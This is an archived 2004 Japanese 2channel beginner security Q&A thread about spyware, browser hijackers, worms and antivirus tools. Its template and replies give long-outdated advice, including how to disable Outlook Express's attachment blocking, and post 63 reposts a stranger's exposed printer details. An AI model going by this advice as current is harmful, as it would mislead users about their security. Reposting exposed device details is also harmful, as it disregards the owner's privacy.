5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

セキュリティ初心者質問スレッドpart43

1 :名無しさん@お腹いっぱい。:04/06/13 11:32
インターネットとパソコンのセキュリティ関係の初心者質問スレです。

★━ 質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ OSの種類(必須)、ブラウザ、セキュ関係ソフトの有無、やってみたこと等できる
   だけ詳しく報告。(例)「WinXPSP1,IE6SP1使用。ADSL回線でプロバイダは〜
   〜のルータを導入しているが、〜ができなくなった」等
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ マルチポスト(他スレ、他サイトとの同時質問)禁止。他スレから誘導された場合は、
   その旨書くこと。
 ・ 違法な話題や質問(WinMX、Winny、エミュレータ等)は禁止です。
 ・ 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。

《参考》
・ウィルスにやられた→【正式】ウィルス情報&質問 総合スレッド☆Part19
  http://pc5.2ch.net/test/read.cgi/sec/1083586576/
・IEが乗っ取られて変になった↓
  初心者板 http://pc5.2ch.net/pcqa/ に逝って「エロサイト」で検索
  ↑のまとめサイト http://haiiro.info/my/text/template.html
・Windowsの動作がおかしい→ http://winfaq.jp/
・なんでもいいからとりあえず検索→Google http://www.google.co.jp/
・ページ内検索→ Win:[Ctrl]+[F](Mac:[コマンド]+[F])
・分類不明の質問→[ここらあたりで探してください] http://pc5.2ch.net/pcqa/
・2ちゃんねるの仕様の質問→ http://etc2.2ch.net/qa/
・2chスレッドタイトル検索→ http://www.ruitomo.com/~gulab/k.html

すみません。新スレ立てるのが遅くなりまして。

2 :名無しさん@お腹いっぱい。:04/06/13 11:37
2

3 :名無しさん@お腹いっぱい。:04/06/13 11:50
【過去ログ】
part42 http://pc5.2ch.net/test/read.cgi/sec/1085705573/ 前スレ
part41 http://pc5.2ch.net/test/read.cgi/sec/1084345263/
part40 http://pc5.2ch.net/test/read.cgi/sec/1082207307/
part39 http://pc3.2ch.net/test/read.cgi/sec/1080480132/
part38 http://pc3.2ch.net/test/read.cgi/sec/1078216939/
part37 http://pc.2ch.net/test/read.cgi/sec/1076728395/
part36 http://pc.2ch.net/test/read.cgi/sec/1075135866/
part35 http://pc.2ch.net/test/read.cgi/sec/1072675686/
part34 http://pc.2ch.net/test/read.cgi/sec/1070035602/
part33 http://pc.2ch.net/test/read.cgi/sec/1068471471/
part32 http://pc.2ch.net/test/read.cgi/sec/1066831852/
Part31 http://pc.2ch.net/test/read.cgi/sec/1064799419/
Part30 http://pc.2ch.net/test/read.cgi/sec/1063081161/
Part29 http://pc.2ch.net/test/read.cgi/sec/1061521014/
Part28 http://pc.2ch.net/test/read.cgi/sec/1059642238/
Part27 http://pc.2ch.net/test/read.cgi/sec/1058283714/
Part26 http://pc.2ch.net/test/read.cgi/sec/1056288419/
Part25 http://pc.2ch.net/test/read.cgi/sec/1054458698/
Part24 http://pc.2ch.net/test/read.cgi/sec/1052123602/
Part23 http://pc.2ch.net/test/read.cgi/sec/1050042334/
Part22 http://pc.2ch.net/test/read.cgi/sec/1047648810/
Part21 http://pc.2ch.net/test/read.cgi/sec/1044609731/
Part20 http://pc.2ch.net/test/read.cgi/sec/1042516088/
Part19 http://pc.2ch.net/test/read.cgi/sec/1040876540/
Part18 http://pc.2ch.net/sec/kako/1039/10390/1039053088.html

4 :名無しさん@お腹いっぱい。:04/06/13 11:52
【初心者向けセキュリティの常識】

■Windows Updateを実行し、「重要な更新」は必ずインストールしておく。
■Internet Explorer:つねに最新バージョンにアップデートしておく。(IE5.5sp2、
 6.0sp1以降推奨)
■安全なブラウザを利用する:
 Opera http://opera.livedoor.com/download/
  Opera日本語ファイル http://my.opera.com/community/customize/langs/
 Firefox http://www.mozilla.org/products/firefox/
■怪しいメール:開かずに捨てる。IE5.01SP2,IE5.5SP2,IE6.0以上でなく
 Outlook Expressを使用している場合、メールをクリックしただけで感染する場合が
 あるので、プレビュー機能は必ずオフにしておく。
■アンチウィルス:常に最新パターン(ウィルス定義ファイル)に更新してないと意味なし
■不審なURL対策:
URLの文字列をよく見る。sex、loli、search、virusなどの文字列が入っていないか?
 鑑定→ラウンジ http://ex5.2ch.net/entrance/ へ。その他「勇気」「鑑定」等の
 キーワードで鑑定スレを検索。
 初心者が誤ってクリックしないよう、ウィルスやブラクラへ直接リンクを張らないこと。
 リンク先を直接見る→「対象をファイルに保存」→メモ帳で一度開いてみる。
■アダルトサイト対策
 インターネットオプション→セキュリティ→インターネット→レベルのカスタマイズ
 → ActiveX、JAVA、スクリプトを全て無効
 ブラウザハイジャッカーの99%はIE以外では作動しない。IEの部品を利用しないOperaや
 Firefoxを利用するとトラブルを防げる。
■最近はウィルス以外にブラウザを乗っ取って個人情報を盗んだり、エロサイトに飛ばし
  たりするスパイやハイジャッカーが流行している。アンチウィルスソフトだけでは防げ
  ないのでアンチスパイソフトも入れておく。参考 http://haiiro.info/my/text/template.html

5 :名無しさん@お腹いっぱい。:04/06/13 11:53
【OE(=Outlook Express)】
・OEのプレビューをオフ
 [表示]-[レイアウト]-「プレビューウィンドウを表示する」
 のチェックを外す。

・OE6で添付ファイルが開けない
 「添付ファイルは安全でないため……」と表示される。
  [ツール]-[オプション]-[セキュリティ]タブ-「ウイルスの
 可能性がある添付ファイルを保存したり開いたりしない」
 のチェックを外す。

・OE以外のメーラーならウィルスメールを開いても安全か?
 IEコンポーネントを利用してHTMLメールを表示する場合はご用心。

 →[おすすめのメールソフトは何?]スレ参照
 http://pc5.2ch.net/test/read.cgi/software/1075136971/

 OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
 http://pc5.2ch.net/test/read.cgi/sec/1021363841/

 IE6SP1適用済みOE6ならHTMLメールをテキスト形式表示可能
 http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021007/1/
 http://www.ipa.go.jp/security/txt/2002_10.html


6 :名無しさん@お腹いっぱい。:04/06/13 11:54
【IPアドレス】
・自分のIPアドレスを確認
 9x系:[ファイル名をしてして実行]→winipcfg.exeを実行。
 NT系:コマンドプロント起動→ipconfig /allを実行。

・他人のIPアドレスを確認
 MS-DOSプロンプト(コマンドプロンプト)を起動して、
 netstat -anを実行。表示されたポートから判断。

・IPアドレスから個人情報は漏れるか?
 プロバイダが所有する情報は公権力が無い限り、外部漏洩は
 通常なし。それよりもクラッキング対策をするべき。

・IPアドレスからプロバイダを知りたい
 >>7-11の【Whois】参照。なお、結果を貼りつけても無視される。

【掲示板】
・掲示板荒らし対策
 注意、警告、放置、削除、一時閉鎖、利用制限、通告、完全閉鎖。
 冷静に判断し、対応。困っているのは貴方だけではない。

・掲示板利用者のIPアドレスは調べられるか?
 HTMLソースに書いてある場合もある。

7 :名無しさん@お腹いっぱい。:04/06/13 11:57
【各種 Firewall】
ZoneAlarm (本家) http://www.zonelabs.com/ (日本) http://jp.zonelabs.com/
Kerio Technologies Inc. | Kerio Personal Firewall
http://www.kerio.com/kpf_home.html
Tiny Personal Firewall http://www.tinysoftware.com/home/tiny2?la=JP
Agnitum Outpost http://www.agnitum.com/download/outpost1.html
Sygate Personal Firewall http://www.sygate.com/
AtGuard http://www.atguard.com/
BlackICE Defender http://blackice.jp/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://www.angelfire.com/falcon/icewatch2000/
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/ (リンク切れ)
【スパイソフト発見ソフト】
Ad-aware http://www.lavasoft.nu/support/download/
Spybot http://security.kolla.de/
【フリー版、体験版、日本語パッチ 等】
ZoneAlarm英語フリー版、Pro http://www.zonelabs.com/store/content/company/products/trial_zaFamily/trial_zaFamily.jsp
フリー版→「ZoneAlarm Free Download」、Pro→「ZoneAlarm Pro」
ZoneAlarm日本語フリー版 http://jp.zonelabs.com/download/znalm.html
ZoneAlarm日本語Pro評価版 http://jp.zonelabs.com/products/zapTrial.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/


8 :名無しさん@お腹いっぱい。:04/06/13 12:02
【セキュリティ チェックサイト】
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm (リンク切れ)
Symantec Security Check
http://security.symantec.com/default.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.homelinux.org/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

[ウィルス情報]
IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/vinfo/
McAfee ウイルス検索 http://www.nai.com/japan/security/vlibrary.asp

9 :名無しさん@お腹いっぱい。:04/06/13 12:04
[Windows板] 広告カットとファイヤーウォールソフト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板]
自分のパソコンへの不正侵入対策してますか?2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者@2ch掲示板 http://pc6.2ch.net/pcqa/
初級ネットワーク@2ch掲示板 http://pc5.2ch.net/hack/
windows@2ch掲示板 http://pc5.2ch.net/win/
ソフトウェア http://pc5.2ch.net/software/
ダウンロードソフト(download板) http://tmp3.2ch.net/download/
パソコン一般@2ch掲示板 http://pc6.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイトダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.homelinux.org/

・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)やOpera(オペラ)を使用するという手段があることも念頭にいれてお いてください
http://wp.netscape.com/ja/
http://opera.livedoor.com/

10 :名無しさん@お腹いっぱい。:04/06/13 12:07
【ウィルス/ファイアーウォール】
・無料で使えるアンチウイルスソフト
 AVG http://pc5.2ch.net/test/read.cgi/sec/1086672009/l50
 BitDefender Free Edition http://pc5.2ch.net/test/read.cgi/sec/1081557959/l50
 antivir http://pc5.2ch.net/test/read.cgi/sec/1078021321/l50
・ソフトがなければ、オンラインウィルススキャン
 http://www.symantec.com/region/jp/securitycheck/index.html
 http://www.trendmicro.co.jp/hcall/index.asp
(※署名済みActiveXコントロールのダウンロードを有効にすること)

・ウィルス対策ソフトの用語
 「駆除」:ファイルからウィルスを取り除くこと。
 「隔離、検疫」:ファイルをリネーム、移動。実行できなくする。
 「削除」:ファイル自体を削除。ワーム本体は通常、削除される。
・デマウィルス(安全なファイルをウィルスだと言い張る偽情報)
 jdbgmgr.exe、sage.exeなどは全てWindowsのシステムファイル。
 http://www.ipa.go.jp/security/topics/alert140515.html参照。
・webメール:添付ファイルを実行した場合、感染確率大。
 hotmail:ウィルス検査はあるが、新種のウィルス相手には無力。
・MacはWindowsのウィルスに感染するか?
 WindowsのアプリケーションはMacでは通常は実行できないので、
 感染はしない。但し、保菌してMac→Winへ感染する例がある。
・ファイアーウォールがトロイのアクセスをブロックしたが…
 アウトバウンドで検出:感染の可能性高。
 インバウンドで検出:感染の可能性低。念のためにチェック。
 ※たまたまバックドアツールが通常使うポートと同じ場合もある。


11 :名無しさん@お腹いっぱい。:04/06/13 12:09
遅ればせながら開始

12 :名無しさん@お腹いっぱい。:04/06/13 12:10
>>1
乙です。

13 :名無しさん@お腹いっぱい。:04/06/13 12:10
おつ

14 :名無しさん@お腹いっぱい。:04/06/13 12:31
超初心者でスミマセン。スパイウエアにやられたみたいです。
ホームページが変えられてるし、ポップアップの広告が出てくる。
Ad-awareやってみたんですけど変わらないような。

電源入れるときterminal sensor is failedという表示も出てくる。
何もかも私にはワケワカラン…ので
修理に出してしまえば全て解決できるのでしょうか…

15 :名無しさん@お腹いっぱい。:04/06/13 12:33
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●

無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

16 :名無しさん@お腹いっぱい。:04/06/13 13:28
>>14
解決するけど、保存してあるデータ消えるよ
見られたくないデータ覗かれるよ

データのバックアップ取って、取説見ながら再インストールすればいい

17 :名無しさん@お腹いっぱい。:04/06/13 13:37
>>14
>>1 から読み直してみ。たったの13レスだから読めるだろ。
君のような人が多いのでちゃんと解決のヒントが書かれている。


18 :名無しさん@お腹いっぱい。:04/06/13 15:54
>14
とりあえず>>1読んで。
「・IEが乗っ取られて変になった」のところにあるまとめサイト行って
「応急処置」をすべて実行。

はっきりいうと、ひとつのソフトでは対処しきれない事が多いんだよ。
他のソフトもひとおおりためし、さらに手動での作業も必要になると思ってね。


19 :名無しさん@お腹いっぱい。:04/06/13 18:21

AccessDriverの使い方がわかるサイトない?
よくわからん。
スレ違い(板違い?)だったら叩いて。

20 :名無しさん@お腹いっぱい。:04/06/13 22:03
バン

21 :名無しさん@お腹いっぱい。:04/06/13 23:39
超初心者ですいません。
どこに相談して、どうやって検索していいか解からなかったので

昨日から勝手にWEBページを開きに行くんです
ほかのWEBを見てても勝手に行っちゃうんです
ekoote.comとかMedia Ticketとか訳わからんです



22 :21:04/06/13 23:40
あっ
ちなみにウィルスバスターしたんですが
何も出てこなかったです

23 :名無しさん@お腹いっぱい。:04/06/13 23:42
>>21
ウイルスチェックではなく、スパイウェアチェックして来い。
ttp://haiiro.info/my/text/template.html
ここを参考に。

24 :名無しさん@お腹いっぱい。:04/06/14 00:13
WEB ブラウズしている最中に突然
エクスプローラでファイルコピーをしている時のようなダイアログ
が表示され 電子メールを送る準備をしていますとメッセージが
でてハードディスクがアクセスしていたのですが。
何が起こったのでしょうか?
ウイルスには感染してないようですが、メールが勝ってに送られた??

25 :名無しさん@お腹いっぱい。:04/06/14 00:33
後は送信ボタンを押すだけ、だろ?

26 :名無しさん@お腹いっぱい。:04/06/14 02:19
知人がウイルスチェックしたらBackdoor.Jeem が検出されたそうです。
駆除ソフトを入れるにもCDドライブが壊れていて無理で
フリーのアンチウイルスソフトをダウンロードしようとしても
本人曰くブラクラを踏んだ時のようになる(?)でそれもできないそうです。
せめてウインドウズアップデートでもしてみたら?とアドバイスしてみましたが
ダウンロードして再起動しようとしたところ、何度やってみても再起動できず全く動かなくなったそうです。
自分も初心者なのに余計なアドバイスをしたせいでこうなってしまったのかとガクブルしています。
この知人にアドバイスしてやれることは何でしょうか?
「買 い 替 え ろ」やっぱりこれだけ?

27 :名無しさん@お腹いっぱい。:04/06/14 02:32
知人には二度とパソコンさわるな
>26 は テンプレ 嫁

28 :26:04/06/14 02:49
テンプレ読んでませんでした。
OSはWindowsMeで回線はCATVだそうです。
常時接続で何も対策してない時点で終わってますよね。
本当に「触るな」と言っておきます。
スレ汚し失礼しました。

29 :名無しさん@お腹いっぱい。:04/06/14 06:02
スパイウェアしたんですが。
AlexaとTrackingCookieってのが引っかかりました。
選択してもいいの?

30 :名無しさん@お腹いっぱい。:04/06/14 07:43
>>29
あぁ、洗濯しとけ。

31 :名無しさん@お腹いっぱい。:04/06/14 07:57
教えてください
甥っ子のパソコンたちあがりません
小1のため何をしたのか不明
PC FMV 300Hrz
OS Win2000
ADSL
セキュリティはほとんどなし? 父親パソコン初心者
症状
立ち上げ後 Win画面が出ると再起動し始める
サッサーに感染でしょうか
F8でセーフモードを立ち上げても戻ってしまう
子供に中古品を買ったためOS,Soft何もない
再インストールもできない
不正はしたくないしセーフモードで立ち上げることができれば
後は何とかなるんですが
長文ですいません

32 :名無しさん@お腹いっぱい。:04/06/14 08:15
>>31
OSくらい書きましょう。ちなみにSASSERは2000とXPにしかかからんよ。

33 :32:04/06/14 08:18
↑スマソ
OS書いてあった(汗
フロッピーささりっぱなし、CD入れっぱなしとかは?ケーブル抜いてもあがんない?

34 :31:04/06/14 08:21
>>32
あのー
OSはWin2000て書いたんですけど

35 :31:04/06/14 08:40
>>32,33
レスありがとう
フロッピー、CDは入ってません
ケーブル抜くってなんですか
LANケーブルならば抜いてあります
モニター以外つないでいません

36 :名無しさん@お腹いっぱい。:04/06/14 09:40
>>35
立ち上げ後、60秒カウントダウンが始まるんならsasser系かもしれんね。
別PCからノートンのサイトに行って除去ツールをダウンロードして、該当
PCにセットして実行。

あとはテンプレみて適切な対処をしてください。

37 :名無しさん@お腹いっぱい。:04/06/14 09:44
バスタオンラインスキャでTROJ_PORNDILAL.AGが2個見つかりました。駆除不可。
検索にもデータベースにもひっかかりません。なんでしょうか?
症状は立ち上げ画面がバグッていて、ポインタもバグってます。
ウインドウズXPです

38 :名無しさん@お腹いっぱい。:04/06/14 10:38
>>30
ありがとう。

39 :名無しさん@お腹いっぱい。:04/06/14 11:58
>>31
このご時世に小1の子にPCまんま与えてる親が信じられん。
しかも無対策?!
その親によく考えるようにいっとけ
そ の P C 捨 て る が 子 供 の 為
親が初心者だとPCのいろんな意味での脅威って無頓着なんだろうけど
それを教えられない親が子供に買い与える資格はない
スレ違いスマソ

40 :名無しさん@お腹いっぱい。:04/06/14 12:31
>>39
最近の小学生事件にも・・(ry

41 :名無しさん@お腹いっぱい。:04/06/14 13:10
だよなぁ、既知外耐性のない子供にPCを与えるのは躊躇しちゃうゾ。

42 :名無しさん@お腹いっぱい。:04/06/14 16:02
不完全なtcpやudpの接続でもセキュ穴さえあれば任意のコードを実行できたりする?

43 :名無しさん@お腹いっぱい。:04/06/14 16:06
>>31
いままで普通に使えてたのか。
FMVって結構凄いな。

44 :名無しさん@お腹いっぱい。:04/06/14 18:07
>>31
セーフモードであげてもどるってどうゆういみ?

45 :名無しさん@お腹いっぱい。:04/06/14 18:36
IE以外につかうならオススメおしえてください。

46 :名無しさん@お腹いっぱい。:04/06/14 18:46
自分はウイルスソフトは入ってますが、インターネット
セキュリティ系のソフトは入っていません。

やっぱり個人で使っているようなPCでも
入れないとヤバイのでしょうか?

よくそんなPCでインターネットできるな?みたいな感じを
セキュリティに詳しい人は受けたりするのでしょうか?

47 :名無しさん@お腹いっぱい。:04/06/14 19:08
ad-ware,BitDefenderとかなら普通にアップデートできるんですが、AVGやspywareblaster,a2はアップデートできません。
どうしてなんでしょうか?

48 :名無しさん@お腹いっぱい。:04/06/14 19:21
>>47
AVGは鯖が渋滞してるんじゃねえか

49 :47:04/06/14 20:09
>48
そういうことでもないんですよ。いつしようが関係なく繋がらない。

50 :名無しさん@お腹いっぱい。:04/06/14 21:36
>>46
全部がそう思いませんよ。
例えば、インターネットは見るだけで、メール(極端)やショッピングやオークションはやらないなら、
個人情報がネットから漏れることはないとし。
それを認識した上で、コストをかけ、セキュリティ対策を施す必要はないと判断している人もいるはずです。
そういう人にはお金をかけるように勧めていません。個人的な友人間とか。

ただ、ウイルスになると話は別で、他の無関係なPCやサーバにアタックしようとしてしまいますので、
他人に迷惑をかけないという点で必要ではないでしょうか?


51 :名無しさん@お腹いっぱい。:04/06/14 22:15
リンクをクリックすると、一旦外国のHPに
飛ばされるんですが・・・・
ウィルスチェックは、何度しても白。
スパイウェアも何も引っかかりません。
なんでしょうか?

52 :名無しさん@お腹いっぱい。:04/06/14 22:24
>>50
エロサイトに行ってスパイウェアをがんがん仕込まれるといい。・
スパイウェアは、普通のソフトにも一緒に仕込まれている。

53 :名無しさん@お腹いっぱい。:04/06/14 22:27
>>52
最近は手口が巧妙になってきて、エロサイトじゃなくても擬装されてたりするのにね

>例えば、インターネットは見るだけで、メール(極端)やショッピングやオークションはやらないなら、
>個人情報がネットから漏れることはないとし。

こんなこと言ってる時点で>>50は馬鹿

54 :名無しさん@お腹いっぱい。:04/06/14 22:38
>>50
もしも、あんたのメールボックスに、エロサイトからのスパムメールが、がんがん送られてくるようなら、
既にスパイウェアが仕込まれている。

55 :名無しさん@お腹いっぱい。:04/06/14 22:48
知人がワーム放って必要な情報ゲットしたぜーとか話してるのですが
これって違法ですか?

56 :名無しさん@お腹いっぱい。:04/06/14 22:53
>>55
ホントならばっちり違法。
通報汁。

57 :名無しさん@お腹いっぱい。:04/06/14 22:57
aa

58 :名無しさん@お腹いっぱい。:04/06/14 22:59
最近PCが重い。
ショートカットのテキスト文書クリックでも開くまで1、2秒はかかる。
あと出会い系とかで気に入った人にメール送ろうとすると
止まる。エラー送信しますか?とか出てきて終わる
どうすればいい?

59 :名無しさん@お腹いっぱい。:04/06/14 23:01
2ちゃんねるにも書き込めない時がある。
エラー送信になって。
それと、ホームが海外サイトになってたんだが、それを
ツール使って直したんだけど、ホームは大丈夫だけど
標準がまだ得ろサイトのアドになってる。
どうすれば変えられる?


60 :名無しさん@お腹いっぱい。:04/06/14 23:02
紹介されたサイトとかスレは全部試した。

61 :名無しさん@お腹いっぱい。:04/06/14 23:42
>>60
どこを紹介されて何を試したのか知らんが、詳しく書きたくないならOS再インストール

62 :名無しさん@お腹いっぱい。:04/06/14 23:53
どうやって再インストールできるの?
それした場合は今ある記録は全部消える?
それともそのままうつせる?
それとPC自体がおかしくなることはないの?
OSがおかしいのか?


63 :名無しさん@お腹いっぱい。:04/06/15 00:10
CUPSお使いの外側に垂れ流し中の
マカーさん印刷可能状態ですよ〜

Description: BJ S500
Location: eMac(Panther)
Printer State: idle, accepting jobs.
Device URI: file:///dev/null
MAC addr: 00-0a-95-92-01-??
Last Job: Mon Jun 14 18:06:55 2004(size:12301k)

64 :名無しさん@お腹いっぱい。:04/06/15 00:34
AVG AntiVirus で完全スカンしたらフォトショもイラレもペインターも消えちまった・・・・
virus found win32/pariteという名目で確かに隔離扱いになってるのにvirus vaultには入ってない。
検索しても顔出さない・・・・・いったいドコへ・・・・

65 :名無しさん@お腹いっぱい。:04/06/15 00:43
>>58
1〜2秒も待てないとは、また贅沢な。
>>62
自分が作ったデータは退避しとけ。メールとかブックマークとか諸々。

66 :名無しさん@お腹いっぱい。:04/06/15 00:52
前スレの後半の893(だったとおもう・・)
で質問したものですが、ウイルスチェックした結果26個のファイルが
感染してました。。。

おもなウイルスは TROJ でした。。。(15個くらい。。)
ほかには BKDR SANDBOX、
JS IESTART.PS
CHM PSYME.C
VBS PSYME.C

などなど盛りだくさんでした。。。

「ToRoI Buster」というもので削除できますか?
あまり詳しくないので簡単な方法があれば教えてください。

無料サイトではやっぱり削除まではできないですか?
質問ばかりですみません。自分なりにいろいろ試したんですがこんなにたくさん感染
したことがないので困っています。

アドバイスください。おねがいします。


67 :名無しさん@お腹いっぱい。:04/06/15 00:57
環境は
XP IE6 ADSL
です。

いろいろなBBSに書き込む際、自分のHPアドレスが勝手にエロサイトに書き換えられてしまいます。
ノートンやspybotで一通りスキャンしてみましたが、解決しません。
検索などで調べてもビンゴせず。
何か考えられる要因はありますでしょうか?

68 :名無しさん@お腹いっぱい。:04/06/15 00:58
>>65
そのメールとかさ、メッセとかはそのまま継続できるの?
例えばPC買い換えたらメアドとかも変えなきゃだめなの?


69 :名無しさん@お腹いっぱい。:04/06/15 01:00
>>68
君は電話機を変える度に電話番号も変えるかい?

70 :名無しさん@お腹いっぱい。:04/06/15 01:04
環境は XP IE6 ケーブル です。
メールをある人に送ってそのメールだけで住所を特定
されるということはないですよね?ちょっと心配なことがあって・・・
犯罪的なことでないとプロバイダーは情報公開できないと聞いた事
があるときいたのですが・・・誰かわかる人は教えてください。

71 :名無しさん@お腹いっぱい。:04/06/15 02:29
>>70
メールだけで住所が判明する事はない。
但し。
その「ある人」との関係が判らないけど、例えばメールに本名を書いてて、
それを卒業名簿や社員名簿と照らし合わせれば判っちゃう。
又は、あなたと「その人」に共通の知人がいて、その知人経由でとか。
こういうソーシャルな方法が考えられないのなら、心配する事はない。

72 :31:04/06/15 06:25
おそレスでごめん
>>36ありがとう
>>44OSがこわれているかも
>>39-41馬鹿親によく言っておきます


73 :名無しさん@お腹いっぱい。:04/06/15 09:17
ノートン2002使いだけど、更新期限が切れたので2日にいっぺんくらい
トレンドマイクロのオンラインスキャンをしているんだが
そうすると必ずノートンの方ががウイルスに反応する。
今日もLoveletter.Aほか数個
しかしトレンドマイクロの方は未検出で終了。
どちらを信用すればいいのでしょう?

74 :名無しさん@お腹いっぱい。:04/06/15 09:53
>73
どのファイルから検出してるのよ?
2chブラウザのログとかだったら、Nortonの誤検出の可能性があるんだけど。

・・・てか、ソフト買えよ・・・
今だとバスターのほうがお勧めかなあ?


75 :名無しさん@お腹いっぱい。:04/06/15 10:05
>>66
> 前スレの後半の893(だったとおもう・・)

ヤ●ザ・・・(((( ;゚Д゚)))ガクガクブルブル

76 :名無しさん@お腹いっぱい。:04/06/15 10:10
>>73
シマンテックのオンラインスキャンしてみりゃ良いんじゃねぇか?
つか、ライセンスぐらい更新しとけよ。

77 :名無しさん@お腹いっぱい。:04/06/15 10:14
確かに2chやるならノートンはあまり向かないな。
わざと誤検出させるような書き込みされる事があるし。

78 :名無しさん@お腹いっぱい。:04/06/15 10:41
設定しておけば済むこと

79 :名無しさん@お腹いっぱい。:04/06/15 14:25
シマンテックのシステムワークスとスパイボット入れてて、家用LANをルーター通して接続してる場合、
まあ通常のセキュリティは保たれてるよね?

80 :名無しさん@お腹いっぱい。:04/06/15 14:26
海外のフォントサイトを回っていたら、なにやら色々仕掛けられました
全て駆除し、対策室などで質問し、IEなどの異常もなし、
NAV、Spybot、AD-Aware等でも何も検出されなくなり、
他の有名な駆除ツールでも全てOKと出ました
ただその残骸なのかとても怪しいDLLがあります
削除していいか分からずとりあえずフォルダ作って入れてあるんですが、
起動ごとにアクセスしてるようで・・・(と言うかタイムスタンプが更新されてるだけですが)
別にタスクマネにも何もついてないし・・・ただ検索してもピンと来なくて・・・

・ATPartners.dll
なんか検索すると海外サイトしか出てこないけどなんなのか・・・

・BO2802040113.dll、in6bdlF.dll、in10b6s.dll、msbb321.dll、SHAgentNew.dll
これらについては検索しても出てこなかったんですが、
全部プロパティの製品名が「exe_in_dll Module」となっているんです
これらのファイルももう一台のほうでは一つも・・・
そして「exe_in_dll」とか検索するとまた海外サイトばっかなんですが、
いいこと言ってるのかどうなのか翻訳しても全然分からず・・・

これらは削除してもいいものなのでしょうか?
無論私見でも全然構いませんと言うかお願いします
これ以外に怪しいのといえば
CD_CLINT.DLLとCD_Load.exeくらい・・・
怪しいというより広告表示なんで不本意ながら入れてありますが(;´Д`)
宜しくお願いします

81 :79:04/06/15 14:28
LANは有線で、ウィンドウズアップデートとかはしてます。

82 :名無しさん@お腹いっぱい。:04/06/15 14:40
>>79
まぁまぁ良いんじゃないでしょうか。
最低限、ルーターをかましてれば通常はOKかと。

83 :名無しさん@お腹いっぱい。:04/06/15 14:45
>>79
IEを使うならアウトだ。
http://www.itmedia.co.jp/enterprise/articles/0406/12/news009.html

84 :名無しさん@お腹いっぱい。:04/06/15 14:50
>>83
オペラでも使ってれば良いか。

85 :名無しさん@お腹いっぱい。:04/06/15 14:53
>>80
直ちに危険につながるとは思えないので、
俺だったらしばらくは様子を見ます。

86 :名無しさん@お腹いっぱい。:04/06/15 14:56
>>80
ATPartners.dllはスパイウェアらしい。
ぐぐった最初のページに

Copy this in the adress bar in IE:
www.spywareinfo.com/xscan.php

And you will get X-Cleaner, try it

って書いてあるな。
大丈夫だと思うが、あくまでも自己責任でどうぞw

87 :名無しさん@お腹いっぱい。:04/06/15 15:14
>>85-86
dクスです
いやぁもう一月くらい様子見てるんですが何も実害ないしだけどなんか変だしと・・・w
とりあえずsystem32\新しいフォルダに入れてあるんですが(w
毎回それでもアクセスしてるし下手なことして起動しなくなるのはいやだし・・・
とりあえずAT〜に関してはもうワンランク上の状態(rar圧縮してしまう)にしてみます
他のは何なんだろう・・・プロパティの正式ファイル名がいずれも「exe_in_dll.DLL」・・・

88 :70:04/06/15 16:45
>>71 ありがとうございます。

89 :名無しさん@お腹いっぱい。:04/06/15 17:22
>>80
>タスクマネ
>タスクマネ
>タスクマネ

90 :名無しさん@お腹いっぱい。:04/06/15 17:43
【ソフトのインストール後1年間(バンドル版は90日あるいは180日間)は無償で最新の情報への更新を行うことが出来ますが】
とあります。
私のはハンドル版なのですが、なんかもったいなくありませんか?
ソフトを買ったほうが得ではないでしょうか?

91 :名無しさん@お腹いっぱい。:04/06/15 18:00
>>90
お試し期間ということで、割り切って使ってみるとよいかも。

92 :名無しさん@お腹いっぱい。:04/06/15 18:57
ウィルスバスターのリアルタイム検索、ファイアウォール機能を常時オンに
してあり、Ad-awareも入れてチェックしてますが、先ほどネットを見ていて、
自分のお気に入りに登録してあるサイトを見ようとしたら、いきなり
"dreammail"というサイトに繋がりました。これはどういうことでしょうか。

ヤフーBBの無線LAN(セキュリティ設定済)を使ってます。
よろしくお願いします。

93 :名無しさん@お腹いっぱい。:04/06/15 19:54
ウィルスソフトを買おうかと思うんですが、どのソフトの動作環境を見ても「PC-98には対応してません」とあるんです。
私のPCはPC-9821なんですが、本当に使えないんでしょうか?
それが心配で、いくら安いソフトでも買うのをためらってしまいます。

94 :名無しさん@お腹いっぱい。:04/06/15 19:57
>>92
単なるPOP UPってことはない?

95 :名無しさん@お腹いっぱい。:04/06/15 20:00
>>92
ブラウザジャッカーかな?

>>93
自分もPC98を使ってます。
最近のウイルスはPC98をあまり相手にしてくれません(w
